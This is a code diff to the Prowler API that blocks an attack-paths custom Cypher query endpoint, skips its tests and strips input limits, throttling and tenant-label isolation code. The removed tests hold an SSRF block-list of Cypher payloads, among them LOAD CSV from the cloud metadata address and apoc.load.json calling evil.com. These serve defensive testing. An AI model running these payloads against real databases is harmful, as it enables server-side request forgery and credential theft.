        assert response.status_code == status.HTTP_400_BAD_REQUEST
        assert "not available" in response.json()["errors"][0]["detail"]

+    @pytest.mark.skip(reason="Endpoint temporarily blocked")
    def test_run_custom_query_returns_403_for_write_query(
        self,
        authenticated_client,
@@ -4632,343 +4632,9 @@ class TestAttackPathsScanViewSet:

        assert response.status_code == status.HTTP_403_FORBIDDEN

-    # -- SSRF blocklist (HTTP level) ----------------------------------------------
-
-    @pytest.mark.parametrize(
-        "cypher",
-        [
-            "LOAD CSV FROM 'http://169.254.169.254/' AS x RETURN x",
-            "CALL apoc.load.json('http://evil.com/') YIELD value RETURN value",
-            "CALL apoc.import.csv([{fileName: 'f'}], [], {}) YIELD node RETURN node",
-            "CALL apoc.export.csv.all('file.csv', {})",
-            "CALL apoc.cypher.run('CREATE (n)', {}) YIELD value RETURN value",
-            "CALL apoc.systemdb.graph() YIELD nodes RETURN nodes",
-        ],
-        ids=[
-            "LOAD_CSV",
-            "apoc.load",
-            "apoc.import",
-            "apoc.export",
-            "apoc.cypher.run",
-            "apoc.systemdb",
-        ],
-    )
-    def test_run_custom_query_rejects_ssrf_patterns(
-        self,
-        authenticated_client,
-        providers_fixture,
-        scans_fixture,
-        create_attack_paths_scan,
-        cypher,
-    ):
-        provider = providers_fixture[0]
-        attack_paths_scan = create_attack_paths_scan(
-            provider,
-            scan=scans_fixture[0],
-            graph_data_ready=True,
-        )
-
-        with patch(
-            "api.v1.views.graph_database.get_database_name",
-            return_value="db-test",
-        ):
-            response = authenticated_client.post(
-                reverse(
-                    "attack-paths-scans-queries-custom",
-                    kwargs={"pk": attack_paths_scan.id},
-                ),
-                data=self._custom_query_payload(cypher),
-                content_type=API_JSON_CONTENT_TYPE,
-            )
-
-        assert response.status_code == status.HTTP_400_BAD_REQUEST
-        assert "blocked" in response.json()["errors"][0]["detail"].lower()
-
-    # -- Cross-tenant isolation ---------------------------------------------------
-
-    def test_run_custom_query_returns_404_for_foreign_tenant(
-        self,
-        authenticated_client,
-        create_attack_paths_scan,
-    ):
-        from api.models import Provider, Tenant
-
-        foreign_tenant = Tenant.objects.create(name="foreign-tenant")
-        foreign_provider = Provider.objects.create(
-            tenant=foreign_tenant,
-            provider="aws",
-            uid="123456789999",
-        )
-        attack_paths_scan = create_attack_paths_scan(
-            foreign_provider,
-            graph_data_ready=True,
-        )
-
-        with patch(
-            "api.v1.views.graph_database.get_database_name",
-            return_value="db-test",
-        ):
-            response = authenticated_client.post(
-                reverse(
-                    "attack-paths-scans-queries-custom",
-                    kwargs={"pk": attack_paths_scan.id},
-                ),
-                data=self._custom_query_payload(),
-                content_type=API_JSON_CONTENT_TYPE,
-            )
-
-        assert response.status_code == status.HTTP_404_NOT_FOUND
-
-    def test_cartography_schema_returns_404_for_foreign_tenant(
-        self,
-        authenticated_client,
-        create_attack_paths_scan,
-    ):
-        from api.models import Provider, Tenant
-
-        foreign_tenant = Tenant.objects.create(name="foreign-tenant-schema")
-        foreign_provider = Provider.objects.create(
-            tenant=foreign_tenant,
-            provider="aws",
-            uid="123456789998",
-        )
-        attack_paths_scan = create_attack_paths_scan(
-            foreign_provider,
-            graph_data_ready=True,
-        )
-
-        response = authenticated_client.get(
-            reverse(
-                "attack-paths-scans-schema",
-                kwargs={"pk": attack_paths_scan.id},
-            )
-        )
-
-        assert response.status_code == status.HTTP_404_NOT_FOUND
-
-    # -- Authentication / authorization -------------------------------------------
-
-    def test_run_custom_query_returns_401_unauthenticated(
-        self,
-        providers_fixture,
-        scans_fixture,
-        create_attack_paths_scan,
-    ):
-        from rest_framework.test import APIClient
-
-        provider = providers_fixture[0]
-        attack_paths_scan = create_attack_paths_scan(
-            provider,
-            scan=scans_fixture[0],
-            graph_data_ready=True,
-        )
-
-        unauthenticated = APIClient()
-        response = unauthenticated.post(
-            reverse(
-                "attack-paths-scans-queries-custom",
-                kwargs={"pk": attack_paths_scan.id},
-            ),
-            data=self._custom_query_payload(),
-            content_type=API_JSON_CONTENT_TYPE,
-        )
-
-        assert response.status_code == status.HTTP_401_UNAUTHORIZED
-
-    def test_cartography_schema_returns_401_unauthenticated(
-        self,
-        providers_fixture,
-        scans_fixture,
-        create_attack_paths_scan,
-    ):
-        from rest_framework.test import APIClient
-
-        provider = providers_fixture[0]
-        attack_paths_scan = create_attack_paths_scan(
-            provider,
-            scan=scans_fixture[0],
-            graph_data_ready=True,
-        )
-
-        unauthenticated = APIClient()
-        response = unauthenticated.get(
-            reverse(
-                "attack-paths-scans-schema",
-                kwargs={"pk": attack_paths_scan.id},
-            )
-        )
-
-        assert response.status_code == status.HTTP_401_UNAUTHORIZED
-
-    def test_run_custom_query_returns_403_no_manage_scans(
-        self,
-        authenticated_client_no_permissions_rbac,
-        providers_fixture,
-        scans_fixture,
-        create_attack_paths_scan,
-    ):
-        provider = providers_fixture[0]
-        attack_paths_scan = create_attack_paths_scan(
-            provider,
-            scan=scans_fixture[0],
-            graph_data_ready=True,
-        )
-
-        response = authenticated_client_no_permissions_rbac.post(
-            reverse(
-                "attack-paths-scans-queries-custom",
-                kwargs={"pk": attack_paths_scan.id},
-            ),
-            data=self._custom_query_payload(),
-            content_type=API_JSON_CONTENT_TYPE,
-        )
-
-        assert response.status_code == status.HTTP_403_FORBIDDEN
-
-    # -- Error leakage ------------------------------------------------------------
-
-    def test_run_custom_query_does_not_leak_internals_on_error(
-        self,
-        authenticated_client,
-        providers_fixture,
-        scans_fixture,
-        create_attack_paths_scan,
-    ):
-        from rest_framework.exceptions import APIException
-
-        provider = providers_fixture[0]
-        attack_paths_scan = create_attack_paths_scan(
-            provider,
-            scan=scans_fixture[0],
-            graph_data_ready=True,
-        )
-
-        with (
-            patch(
-                "api.v1.views.attack_paths_views_helpers.execute_custom_query",
-                side_effect=APIException(
-                    "Attack Paths query execution failed due to a database error"
-                ),
-            ),
-            patch(
-                "api.v1.views.graph_database.get_database_name",
-                return_value="db-test",
-            ),
-        ):
-            response = authenticated_client.post(
-                reverse(
-                    "attack-paths-scans-queries-custom",
-                    kwargs={"pk": attack_paths_scan.id},
-                ),
-                data=self._custom_query_payload(),
-                content_type=API_JSON_CONTENT_TYPE,
-            )
-
-        assert response.status_code == status.HTTP_500_INTERNAL_SERVER_ERROR
-        body = json.dumps(response.json()).lower()
-        for forbidden_term in ["neo4j", "bolt://", "syntaxerror", "db-tenant-"]:
-            assert forbidden_term not in body
-
-    # -- Rate limiting (throttle) -------------------------------------------------
-
-    def test_run_custom_query_throttled_after_limit(
-        self,
-        authenticated_client,
-        providers_fixture,
-        scans_fixture,
-        create_attack_paths_scan,
-    ):
-        provider = providers_fixture[0]
-        attack_paths_scan = create_attack_paths_scan(
-            provider,
-            scan=scans_fixture[0],
-            graph_data_ready=True,
-        )
-
-        mock_graph = {
-            "nodes": [{"id": "n1", "labels": ["Test"], "properties": {}}],
-            "relationships": [],
-            "total_nodes": 1,
-            "truncated": False,
-        }
-
-        url = reverse(
-            "attack-paths-scans-queries-custom",
-            kwargs={"pk": attack_paths_scan.id},
-        )
-        payload = self._custom_query_payload()
-
-        with (
-            patch(
-                "api.v1.views.attack_paths_views_helpers.execute_custom_query",
-                return_value=mock_graph,
-            ),
-            patch(
-                "api.v1.views.graph_database.get_database_name",
-                return_value="db-test",
-            ),
-            patch(
-                "api.v1.views.graph_database.clear_cache",
-            ),
-        ):
-            for i in range(11):
-                response = authenticated_client.post(
-                    url,
-                    data=payload,
-                    content_type=API_JSON_CONTENT_TYPE,
-                )
-                if i < 10:
-                    assert (
-                        response.status_code == status.HTTP_200_OK
-                    ), f"Request {i + 1} should succeed with 200 OK, got {response.status_code}"
-                else:
-                    assert (
-                        response.status_code == status.HTTP_429_TOO_MANY_REQUESTS
-                    ), f"Request {i + 1} should be throttled"
-
-    # -- Timeout simulation -------------------------------------------------------
-
-    def test_run_custom_query_returns_500_on_database_timeout(
-        self,
-        authenticated_client,
-        providers_fixture,
-        scans_fixture,
-        create_attack_paths_scan,
-    ):
-        from rest_framework.exceptions import APIException
-
-        provider = providers_fixture[0]
-        attack_paths_scan = create_attack_paths_scan(
-            provider,
-            scan=scans_fixture[0],
-            graph_data_ready=True,
-        )
-
-        with (
-            patch(
-                "api.v1.views.attack_paths_views_helpers.execute_custom_query",
-                side_effect=APIException(
-                    "Attack Paths query execution failed due to a database error"
-                ),
-            ),
-            patch(
-                "api.v1.views.graph_database.get_database_name",
-                return_value="db-test",
-            ),
-        ):
-            response = authenticated_client.post(
-                reverse(
-                    "attack-paths-scans-queries-custom",
-                    kwargs={"pk": attack_paths_scan.id},
-                ),
-                data=self._custom_query_payload(),
-                content_type=API_JSON_CONTENT_TYPE,
-            )
-
-        assert response.status_code == status.HTTP_500_INTERNAL_SERVER_ERROR
-
    # -- cartography_schema action ------------------------------------------------

+    @pytest.mark.skip(reason="Endpoint temporarily blocked")
    def test_cartography_schema_returns_urls(
        self,
        authenticated_client,
@@ -5018,6 +4684,7 @@ class TestAttackPathsScanViewSet:
        assert "schema.md" in attributes["schema_url"]
        assert "raw.githubusercontent.com" in attributes["raw_schema_url"]

+    @pytest.mark.skip(reason="Endpoint temporarily blocked")
    def test_cartography_schema_returns_404_when_no_metadata(
        self,
        authenticated_client,
@@ -5052,6 +4719,7 @@ class TestAttackPathsScanViewSet:
        assert response.status_code == status.HTTP_404_NOT_FOUND
        assert "No cartography schema metadata" in str(response.json())

+    @pytest.mark.skip(reason="Endpoint temporarily blocked")
    def test_cartography_schema_returns_400_when_graph_not_ready(
        self,
        authenticated_client,
@@ -7858,12 +7526,8 @@ class TestUserRoleRelationshipViewSet:
        assert response.status_code == status.HTTP_204_NO_CONTENT
        relationships = UserRoleRelationship.objects.filter(user=create_test_user.id)
        assert relationships.count() == 4
-        # Use set membership instead of positional slicing — QuerySet ordering is
-        # non-deterministic without an explicit order_by, which makes slice-based
-        # checks intermittently fail.
-        added_role_ids = {r.id for r in roles_fixture[:2]}
-        relationship_role_ids = {rel.role.id for rel in relationships}
-        assert added_role_ids.issubset(relationship_role_ids)
+        for relationship in relationships[2:]:  # Skip admin role
+            assert relationship.role.id in [r.id for r in roles_fixture[:2]]

    def test_create_relationship_already_exists(
        self, authenticated_client, roles_fixture, create_test_user
@@ -1241,7 +1241,7 @@ class AttackPathsQueryRunRequestSerializer(BaseSerializerV1):


 class AttackPathsCustomQueryRunRequestSerializer(BaseSerializerV1):
-    query = serializers.CharField(max_length=10000, min_length=1, trim_whitespace=True)
+    query = serializers.CharField()

    class JSONAPIMeta:
        resource_name = "attack-paths-custom-query-run-requests"
@@ -51,13 +51,6 @@ from api.v1.views import (
 )


-# This helper view is used to block any endpoints that should not be available
-# To use it, add a new entry in the `urlpatterns` list, for example (old but real one):
-#     path(
-#         "attack-paths-scans/<uuid:pk>/queries/custom",
-#         _blocked_endpoint,
-#         name="attack-paths-scans-queries-custom-blocked",
-#     ),
@csrf_exempt
 def _blocked_endpoint(request, *args, **kwargs):
    return JsonResponse(
@@ -216,6 +209,17 @@ urlpatterns = [
    path("tokens/saml", SAMLTokenValidateView.as_view(), name="token-saml"),
    path("tokens/google", GoogleSocialLoginView.as_view(), name="token-google"),
    path("tokens/github", GithubSocialLoginView.as_view(), name="token-github"),
+    # TODO: Remove these blocked endpoints once they are properly tested
+    path(
+        "attack-paths-scans/<uuid:pk>/queries/custom",
+        _blocked_endpoint,
+        name="attack-paths-scans-queries-custom-blocked",
+    ),
+    path(
+        "attack-paths-scans/<uuid:pk>/schema",
+        _blocked_endpoint,
+        name="attack-paths-scans-schema-blocked",
+    ),
    path("", include(router.urls)),
    path("", include(tenants_router.urls)),
    path("", include(users_router.urls)),
@@ -408,7 +408,7 @@ class SchemaView(SpectacularAPIView):

    def get(self, request, *args, **kwargs):
        spectacular_settings.TITLE = "Prowler API"
-        spectacular_settings.VERSION = "1.22.1"
+        spectacular_settings.VERSION = "1.21.0"
        spectacular_settings.DESCRIPTION = (
            "Prowler API specification.\n\nThis file is auto-generated."
        )
@@ -2452,11 +2452,6 @@ class AttackPathsScanViewSet(BaseRLSViewSet):
    # RBAC required permissions
    required_permissions = [Permissions.MANAGE_SCANS]

-    def get_throttles(self):
-        if self.action == "run_custom_attack_paths_query":
-            self.throttle_scope = "attack-paths-custom-query"
-        return super().get_throttles()
-
    def set_required_permissions(self):
        if self.request.method in SAFE_METHODS:
            self.required_permissions = []
@@ -113,11 +113,8 @@ REST_FRAMEWORK = {
        "rest_framework.throttling.ScopedRateThrottle",
    ],
    "DEFAULT_THROTTLE_RATES": {
-        "dj_rest_auth": None,
        "token-obtain": env("DJANGO_THROTTLE_TOKEN_OBTAIN", default=None),
-        "attack-paths-custom-query": env(
-            "DJANGO_THROTTLE_ATTACK_PATHS_CUSTOM_QUERY", default="10/min"
-        ),
+        "dj_rest_auth": None,
    },
 }

@@ -3,10 +3,6 @@ from config.env import env

 DEBUG = env.bool("DJANGO_DEBUG", default=False)
 ALLOWED_HOSTS = env.list("DJANGO_ALLOWED_HOSTS", default=["localhost", "127.0.0.1"])
-CORS_ALLOWED_ORIGINS = env.list(
-    "DJANGO_CORS_ALLOWED_ORIGINS",
-    default=["http://localhost", "http://127.0.0.1"],
-)

 # Database
 # TODO Use Django database routers https://docs.djangoproject.com/en/5.0/topics/db/multi-db/#automatic-database-routing
@@ -1,30 +1,25 @@
 from dataclasses import dataclass
 from typing import Callable
-from uuid import UUID

 from config.env import env
+
 from tasks.jobs.attack_paths import aws

-# Batch size for Neo4j write operations (resource labeling, cleanup)
+
+# Batch size for Neo4j operations
 BATCH_SIZE = env.int("ATTACK_PATHS_BATCH_SIZE", 1000)
-# Batch size for Postgres findings fetch (keyset pagination page size)
-FINDINGS_BATCH_SIZE = env.int("ATTACK_PATHS_FINDINGS_BATCH_SIZE", 500)
-# Batch size for temp-to-tenant graph sync (nodes and relationships per cursor page)
-SYNC_BATCH_SIZE = env.int("ATTACK_PATHS_SYNC_BATCH_SIZE", 250)

 # Neo4j internal labels (Prowler-specific, not provider-specific)
-# - `Internet`: Singleton node representing external internet access for exposed-resource queries
 # - `ProwlerFinding`: Label for finding nodes created by Prowler and linked to cloud resources
 # - `_ProviderResource`: Added to ALL synced nodes for provider isolation and drop/query ops
-INTERNET_NODE_LABEL = "Internet"
+# - `Internet`: Singleton node representing external internet access for exposed-resource queries
 PROWLER_FINDING_LABEL = "ProwlerFinding"
 PROVIDER_RESOURCE_LABEL = "_ProviderResource"
+INTERNET_NODE_LABEL = "Internet"

-# Dynamic isolation labels that contain entity UUIDs and are added to every synced node during sync
-# Format: _Tenant_{uuid_no_hyphens}, _Provider_{uuid_no_hyphens}
-TENANT_LABEL_PREFIX = "_Tenant_"
-PROVIDER_LABEL_PREFIX = "_Provider_"
-DYNAMIC_ISOLATION_PREFIXES = [TENANT_LABEL_PREFIX, PROVIDER_LABEL_PREFIX]
+# Phase 1 dual-write: deprecated label kept for drop_subgraph and infrastructure queries
+# Remove in Phase 2 once all nodes use the private label exclusively
+DEPRECATED_PROVIDER_RESOURCE_LABEL = "ProviderResource"


@dataclass(frozen=True)
@@ -36,6 +31,7 @@ class ProviderConfig:
    uid_field: str  # e.g., "arn"
    # Label for resources connected to the account node, enabling indexed finding lookups.
    resource_label: str  # e.g., "_AWSResource"
+    deprecated_resource_label: str  # e.g., "AWSResource"
    ingestion_function: Callable


@@ -47,6 +43,7 @@ AWS_CONFIG = ProviderConfig(
    root_node_label="AWSAccount",
    uid_field="arn",
    resource_label="_AWSResource",
+    deprecated_resource_label="AWSResource",
    ingestion_function=aws.start_aws_ingestion,
 )

@@ -59,16 +56,18 @@ PROVIDER_CONFIGS: dict[str, ProviderConfig] = {
 INTERNAL_LABELS: list[str] = [
    "Tenant",  # From Cartography, but it looks like it's ours
    PROVIDER_RESOURCE_LABEL,
+    DEPRECATED_PROVIDER_RESOURCE_LABEL,
+    # Add all provider-specific resource labels
    *[config.resource_label for config in PROVIDER_CONFIGS.values()],
+    *[config.deprecated_resource_label for config in PROVIDER_CONFIGS.values()],
 ]

 # Provider isolation properties
-PROVIDER_ID_PROPERTY = "_provider_id"
-PROVIDER_ELEMENT_ID_PROPERTY = "_provider_element_id"
-
 PROVIDER_ISOLATION_PROPERTIES: list[str] = [
-    PROVIDER_ID_PROPERTY,
-    PROVIDER_ELEMENT_ID_PROPERTY,
+    "_provider_id",
+    "_provider_element_id",
+    "provider_id",
+    "provider_element_id",
 ]

 # Cartography bookkeeping metadata
@@ -118,25 +117,7 @@ def get_provider_resource_label(provider_type: str) -> str:
    return config.resource_label if config else "_UnknownProviderResource"


-# Dynamic Isolation Label Helpers
-# --------------------------------
-
-
-def _normalize_uuid(value: str | UUID) -> str:
-    """Strip hyphens from a UUID string for use in Neo4j labels."""
-    return str(value).replace("-", "")
-
-
-def get_tenant_label(tenant_id: str | UUID) -> str:
-    """Get the Neo4j label for a tenant (e.g., `_Tenant_019c41ee7df37deca684d839f95619f8`)."""
-    return f"{TENANT_LABEL_PREFIX}{_normalize_uuid(tenant_id)}"
-
-
-def get_provider_label(provider_id: str | UUID) -> str:
-    """Get the Neo4j label for a provider (e.g., `_Provider_019c41ee7df37deca684d839f95619f8`)."""
-    return f"{PROVIDER_LABEL_PREFIX}{_normalize_uuid(provider_id)}"
-
-
-def is_dynamic_isolation_label(label: str) -> bool:
-    """Check if a label is a dynamic tenant/provider isolation label."""
-    return any(label.startswith(prefix) for prefix in DYNAMIC_ISOLATION_PREFIXES)
+def get_deprecated_provider_resource_label(provider_type: str) -> str:
+    """Get the deprecated resource label for a provider type (e.g., `AWSResource`)."""
+    config = PROVIDER_CONFIGS.get(provider_type)
+    return config.deprecated_resource_label if config else "UnknownProviderResource"
@@ -3,13 +3,15 @@ from typing import Any

 from cartography.config import Config as CartographyConfig
 from celery.utils.log import get_task_logger
-from tasks.jobs.attack_paths.config import is_provider_available

 from api.attack_paths import database as graph_database
 from api.db_utils import rls_transaction
-from api.models import AttackPathsScan as ProwlerAPIAttackPathsScan
-from api.models import Provider as ProwlerAPIProvider
-from api.models import StateChoices
+from api.models import (
+    AttackPathsScan as ProwlerAPIAttackPathsScan,
+    Provider as ProwlerAPIProvider,
+    StateChoices,
+)
+from tasks.jobs.attack_paths.config import is_provider_available

 logger = get_task_logger(__name__)

@@ -153,37 +155,6 @@ def set_provider_graph_data_ready(
        attack_paths_scan.refresh_from_db(fields=["graph_data_ready"])


-def recover_graph_data_ready(
-    attack_paths_scan: ProwlerAPIAttackPathsScan,
-) -> None:
-    """
-    Best-effort recovery of `graph_data_ready` after a scan failure.
-
-    Queries Neo4j to check if the provider still has data in the tenant
-    database. If data exists, restores `graph_data_ready=True` for all scans
-    of this provider. Never raises.
-
-    Trade-off: if the worker crashed mid-sync, partial data may exist and
-    this will re-enable queries against it. We accept that because leaving
-    `graph_data_ready=False` permanently (blocking all queries until the
-    next successful scan) is a worse outcome for the user.
-    """
-    try:
-        tenant_db = graph_database.get_database_name(attack_paths_scan.tenant_id)
-        if graph_database.has_provider_data(
-            tenant_db, str(attack_paths_scan.provider_id)
-        ):
-            set_provider_graph_data_ready(attack_paths_scan, True)
-            logger.info(
-                f"Recovered `graph_data_ready` for provider {attack_paths_scan.provider_id}"
-            )
-
-    except Exception:
-        logger.exception(
-            f"Failed to recover `graph_data_ready` for provider {attack_paths_scan.provider_id}"
-        )
-
-
 def fail_attack_paths_scan(
    tenant_id: str,
    scan_id: str,
@@ -214,5 +185,3 @@ def fail_attack_paths_scan(
            StateChoices.FAILED,
            {"global_error": error},
        )
-
-        recover_graph_data_ready(attack_paths_scan)
@@ -9,15 +9,23 @@ This module handles:
 """

 from collections import defaultdict
+from dataclasses import asdict, dataclass, fields
 from typing import Any, Generator
 from uuid import UUID

 import neo4j
+
 from cartography.config import Config as CartographyConfig
 from celery.utils.log import get_task_logger
+
+from api.db_router import READ_REPLICA_ALIAS
+from api.db_utils import rls_transaction
+from api.models import Finding as FindingModel
+from api.models import Provider, ResourceFindingMapping
+from prowler.config import config as ProwlerConfig
 from tasks.jobs.attack_paths.config import (
    BATCH_SIZE,
-    FINDINGS_BATCH_SIZE,
+    get_deprecated_provider_resource_label,
    get_node_uid_field,
    get_provider_resource_label,
    get_root_node_label,
@@ -30,54 +38,75 @@ from tasks.jobs.attack_paths.queries import (
    render_cypher_template,
 )

-from api.db_router import READ_REPLICA_ALIAS
-from api.db_utils import rls_transaction
-from api.models import Finding as FindingModel
-from api.models import Provider, ResourceFindingMapping
-from prowler.config import config as ProwlerConfig
-
 logger = get_task_logger(__name__)


-# Django ORM field names for `.values()` queries
-# Most map 1:1 to Neo4j property names, exceptions are remapped in `_to_neo4j_dict`
-_DB_QUERY_FIELDS = [
-    "id",
-    "uid",
-    "inserted_at",
-    "updated_at",
-    "first_seen_at",
-    "scan_id",
-    "delta",
-    "status",
-    "status_extended",
-    "severity",
-    "check_id",
-    "check_metadata__checktitle",
-    "muted",
-    "muted_reason",
-]
+# Type Definitions
+# -----------------
+
+# Maps dataclass field names to Django ORM query field names
+_DB_FIELD_MAP: dict[str, str] = {
+    "check_title": "check_metadata__checktitle",
+}


-def _to_neo4j_dict(record: dict[str, Any], resource_uid: str) -> dict[str, Any]:
-    """Transform a Django `.values()` record into a `dict` ready for Neo4j ingestion."""
-    return {
-        "id": str(record["id"]),
-        "uid": record["uid"],
-        "inserted_at": record["inserted_at"],
-        "updated_at": record["updated_at"],
-        "first_seen_at": record["first_seen_at"],
-        "scan_id": str(record["scan_id"]),
-        "delta": record["delta"],
-        "status": record["status"],
-        "status_extended": record["status_extended"],
-        "severity": record["severity"],
-        "check_id": str(record["check_id"]),
-        "check_title": record["check_metadata__checktitle"],
-        "muted": record["muted"],
-        "muted_reason": record["muted_reason"],
-        "resource_uid": resource_uid,
-    }
+@dataclass(slots=True)
+class Finding:
+    """
+    Finding data for Neo4j ingestion.
+
+    Can be created from a Django .values() query result using from_db_record().
+    """
+
+    id: str
+    uid: str
+    inserted_at: str
+    updated_at: str
+    first_seen_at: str
+    scan_id: str
+    delta: str
+    status: str
+    status_extended: str
+    severity: str
+    check_id: str
+    check_title: str
+    muted: bool
+    muted_reason: str | None
+    resource_uid: str | None = None
+
+    @classmethod
+    def get_db_query_fields(cls) -> tuple[str, ...]:
+        """Get field names for Django .values() query."""
+        return tuple(
+            _DB_FIELD_MAP.get(f.name, f.name)
+            for f in fields(cls)
+            if f.name != "resource_uid"
+        )
+
+    @classmethod
+    def from_db_record(cls, record: dict[str, Any], resource_uid: str) -> "Finding":
+        """Create a Finding from a Django .values() query result."""
+        return cls(
+            id=str(record["id"]),
+            uid=record["uid"],
+            inserted_at=record["inserted_at"],
+            updated_at=record["updated_at"],
+            first_seen_at=record["first_seen_at"],
+            scan_id=str(record["scan_id"]),
+            delta=record["delta"],
+            status=record["status"],
+            status_extended=record["status_extended"],
+            severity=record["severity"],
+            check_id=str(record["check_id"]),
+            check_title=record["check_metadata__checktitle"],
+            muted=record["muted"],
+            muted_reason=record["muted_reason"],
+            resource_uid=resource_uid,
+        )
+
+    def to_dict(self) -> dict[str, Any]:
+        """Convert to dict for Neo4j ingestion."""
+        return asdict(self)


 # Public API
@@ -124,6 +153,9 @@ def add_resource_label(
        {
            "__ROOT_LABEL__": get_root_node_label(provider_type),
            "__RESOURCE_LABEL__": get_provider_resource_label(provider_type),
+            "__DEPRECATED_RESOURCE_LABEL__": get_deprecated_provider_resource_label(
+                provider_type
+            ),
        },
    )

@@ -152,7 +184,7 @@ def add_resource_label(

 def load_findings(
    neo4j_session: neo4j.Session,
-    findings_batches: Generator[list[dict[str, Any]], None, None],
+    findings_batches: Generator[list[Finding], None, None],
    prowler_api_provider: Provider,
    config: CartographyConfig,
 ) -> None:
@@ -181,7 +213,7 @@ def load_findings(
        batch_size = len(batch)
        total_records += batch_size

-        parameters["findings_data"] = batch
+        parameters["findings_data"] = [f.to_dict() for f in batch]

        logger.info(f"Loading findings batch {batch_num} ({batch_size} records)")
        neo4j_session.run(query, parameters)
@@ -219,17 +251,16 @@ def cleanup_findings(
 def stream_findings_with_resources(
    prowler_api_provider: Provider,
    scan_id: str,
-) -> Generator[list[dict[str, Any]], None, None]:
+) -> Generator[list[Finding], None, None]:
    """
    Stream findings with their associated resources in batches.

    Uses keyset pagination for efficient traversal of large datasets.
-    Memory efficient: yields one batch at a time as dicts ready for Neo4j ingestion,
-    never holds all findings in memory.
+    Memory efficient: yields one batch at a time, never holds all findings in memory.
    """
    logger.info(
        f"Starting findings stream for scan {scan_id} "
-        f"(tenant {prowler_api_provider.tenant_id}) with batch size {FINDINGS_BATCH_SIZE}"
+        f"(tenant {prowler_api_provider.tenant_id}) with batch size {BATCH_SIZE}"
    )

    tenant_id = prowler_api_provider.tenant_id
@@ -278,14 +309,15 @@ def _fetch_findings_batch(
    Uses read replica and RLS-scoped transaction.
    """
    with rls_transaction(tenant_id, using=READ_REPLICA_ALIAS):
-        # Use `all_objects` to get `Findings` even on soft-deleted `Providers`
-        # But even the provider is already validated as active in this context
+        # Use all_objects to avoid the ActiveProviderManager's implicit JOIN
+        # through Scan -> Provider (to check is_deleted=False).
+        # The provider is already validated as active in this context.
        qs = FindingModel.all_objects.filter(scan_id=scan_id).order_by("id")

        if after_id is not None:
            qs = qs.filter(id__gt=after_id)

-        return list(qs.values(*_DB_QUERY_FIELDS)[:FINDINGS_BATCH_SIZE])
+        return list(qs.values(*Finding.get_db_query_fields())[:BATCH_SIZE])


 # Batch Enrichment
@@ -295,7 +327,7 @@ def _fetch_findings_batch(
 def _enrich_batch_with_resources(
    findings_batch: list[dict[str, Any]],
    tenant_id: str,
-) -> list[dict[str, Any]]:
+) -> list[Finding]:
    """
    Enrich findings with their resource UIDs.

@@ -306,7 +338,7 @@ def _enrich_batch_with_resources(
    resource_map = _build_finding_resource_map(finding_ids, tenant_id)

    return [
-        _to_neo4j_dict(finding, resource_uid)
+        Finding.from_db_record(finding, resource_uid)
        for finding in findings_batch
        for resource_uid in resource_map.get(finding["id"], [])
    ]
@@ -6,10 +6,9 @@ from cartography.client.core.tx import run_write_query
 from celery.utils.log import get_task_logger

 from tasks.jobs.attack_paths.config import (
+    DEPRECATED_PROVIDER_RESOURCE_LABEL,
    INTERNET_NODE_LABEL,
    PROWLER_FINDING_LABEL,
-    PROVIDER_ELEMENT_ID_PROPERTY,
-    PROVIDER_ID_PROPERTY,
    PROVIDER_RESOURCE_LABEL,
 )

@@ -28,6 +27,8 @@ FINDINGS_INDEX_STATEMENTS = [
    # Resource indexes for Prowler Finding lookups
    "CREATE INDEX aws_resource_arn IF NOT EXISTS FOR (n:_AWSResource) ON (n.arn);",
    "CREATE INDEX aws_resource_id IF NOT EXISTS FOR (n:_AWSResource) ON (n.id);",
+    "CREATE INDEX deprecated_aws_resource_arn IF NOT EXISTS FOR (n:AWSResource) ON (n.arn);",
+    "CREATE INDEX deprecated_aws_resource_id IF NOT EXISTS FOR (n:AWSResource) ON (n.id);",
    # Prowler Finding indexes
    f"CREATE INDEX prowler_finding_id IF NOT EXISTS FOR (n:{PROWLER_FINDING_LABEL}) ON (n.id);",
    f"CREATE INDEX prowler_finding_provider_uid IF NOT EXISTS FOR (n:{PROWLER_FINDING_LABEL}) ON (n.provider_uid);",
@@ -39,8 +40,10 @@ FINDINGS_INDEX_STATEMENTS = [

 # Indexes for provider resource sync operations
 SYNC_INDEX_STATEMENTS = [
-    f"CREATE INDEX provider_resource_element_id IF NOT EXISTS FOR (n:{PROVIDER_RESOURCE_LABEL}) ON (n.{PROVIDER_ELEMENT_ID_PROPERTY});",
-    f"CREATE INDEX provider_resource_provider_id IF NOT EXISTS FOR (n:{PROVIDER_RESOURCE_LABEL}) ON (n.{PROVIDER_ID_PROPERTY});",
+    f"CREATE INDEX provider_element_id IF NOT EXISTS FOR (n:{PROVIDER_RESOURCE_LABEL}) ON (n._provider_element_id);",
+    f"CREATE INDEX provider_resource_provider_id IF NOT EXISTS FOR (n:{PROVIDER_RESOURCE_LABEL}) ON (n._provider_id);",
+    f"CREATE INDEX deprecated_provider_element_id IF NOT EXISTS FOR (n:{DEPRECATED_PROVIDER_RESOURCE_LABEL}) ON (n.provider_element_id);",
+    f"CREATE INDEX deprecated_provider_resource_provider_id IF NOT EXISTS FOR (n:{DEPRECATED_PROVIDER_RESOURCE_LABEL}) ON (n.provider_id);",
 ]


@@ -2,8 +2,6 @@
 from tasks.jobs.attack_paths.config import (
    INTERNET_NODE_LABEL,
    PROWLER_FINDING_LABEL,
-    PROVIDER_ELEMENT_ID_PROPERTY,
-    PROVIDER_ID_PROPERTY,
    PROVIDER_RESOURCE_LABEL,
 )

@@ -28,7 +26,7 @@ ADD_RESOURCE_LABEL_TEMPLATE = """
    MATCH (account:__ROOT_LABEL__ {id: $provider_uid})-->(r)
    WHERE NOT r:__ROOT_LABEL__ AND NOT r:__RESOURCE_LABEL__
    WITH r LIMIT $batch_size
-    SET r:__RESOURCE_LABEL__
+    SET r:__RESOURCE_LABEL__:__DEPRECATED_RESOURCE_LABEL__
    RETURN COUNT(r) AS labeled_count
 """

@@ -151,18 +149,22 @@ RELATIONSHIPS_FETCH_QUERY = """
    LIMIT $batch_size
 """

-NODE_SYNC_TEMPLATE = f"""
+NODE_SYNC_TEMPLATE = """
    UNWIND $rows AS row
-    MERGE (n:__NODE_LABELS__ {{{PROVIDER_ELEMENT_ID_PROPERTY}: row.provider_element_id}})
+    MERGE (n:__NODE_LABELS__ {_provider_element_id: row.provider_element_id})
    SET n += row.props
-    SET n.{PROVIDER_ID_PROPERTY} = $provider_id
-"""
+    SET n._provider_id = $provider_id
+    SET n.provider_element_id = row.provider_element_id
+    SET n.provider_id = $provider_id
+"""  # The last two lines are deprecated properties

 RELATIONSHIP_SYNC_TEMPLATE = f"""
    UNWIND $rows AS row
